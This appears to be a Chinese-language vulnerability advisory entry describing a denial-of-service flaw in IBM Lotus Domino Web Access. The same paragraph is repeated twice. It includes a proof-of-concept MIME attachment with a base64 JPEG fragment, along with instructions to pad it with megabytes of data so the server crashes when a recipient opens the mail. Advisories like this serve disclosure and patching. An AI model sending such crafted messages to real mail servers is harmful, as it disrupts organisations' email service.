VULHUB ™

Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构，运行在Linux/Unix和Microsoft Windows操作系统平台下。 IBM Lotus Domino服务器不正确处理部分恶意邮件，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。 攻击者可以打开邮件程序，然后写一段如下消息发送给通过Domino Web Access读取邮件的用户： --- snip here; do not paste this line -- Content-Disposition： Attachment; filename=\"PC210017.JPG\" Content-Type： image/jpeg; Name=\"PC210017.JPG\" Content-Transfer-Encoding： Base64 /9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN [Add here some megabytes of data. 1kB is not enough， but 12MB was sufficient in all my tests] --- snip here; do not pste this line --- 这样当接收者在Domino Web Access中打开邮件时，可导致Domino服务器崩溃。

Lotus Domino/Notes服务器是一款基于WEB合作的应用程序架构，运行在Linux/Unix和Microsoft Windows操作系统平台下。 IBM Lotus Domino服务器不正确处理部分恶意邮件，远程攻击者可以利用这个漏洞对服务程序进行拒绝服务攻击。 攻击者可以打开邮件程序，然后写一段如下消息发送给通过Domino Web Access读取邮件的用户： --- snip here; do not paste this line -- Content-Disposition： Attachment; filename=\"PC210017.JPG\" Content-Type： image/jpeg; Name=\"PC210017.JPG\" Content-Transfer-Encoding： Base64 /9j/4Re0RXhpZgAASUkqAAgAAAALAA4BAgAgAAAAkgAAAA8BAgAYAAAAsgAAABABAgAMAAAA ygAAABIBAwABAAAAAQAAABoBBQABAAAA2AAAABsBBQABAAAA4AAAACgBAwABAAAAAgAAADEB AgAJAAAA6AAAADIBAgAUAAAACAEAABMCAwABAAAAAgAAAGmHBAABAAAAHAEAAAADAABPTFlN [Add here some megabytes of data. 1kB is not enough， but 12MB was sufficient in all my tests] --- snip here; do not pste this line --- 这样当接收者在Domino Web Access中打开邮件时，可导致Domino服务器崩溃。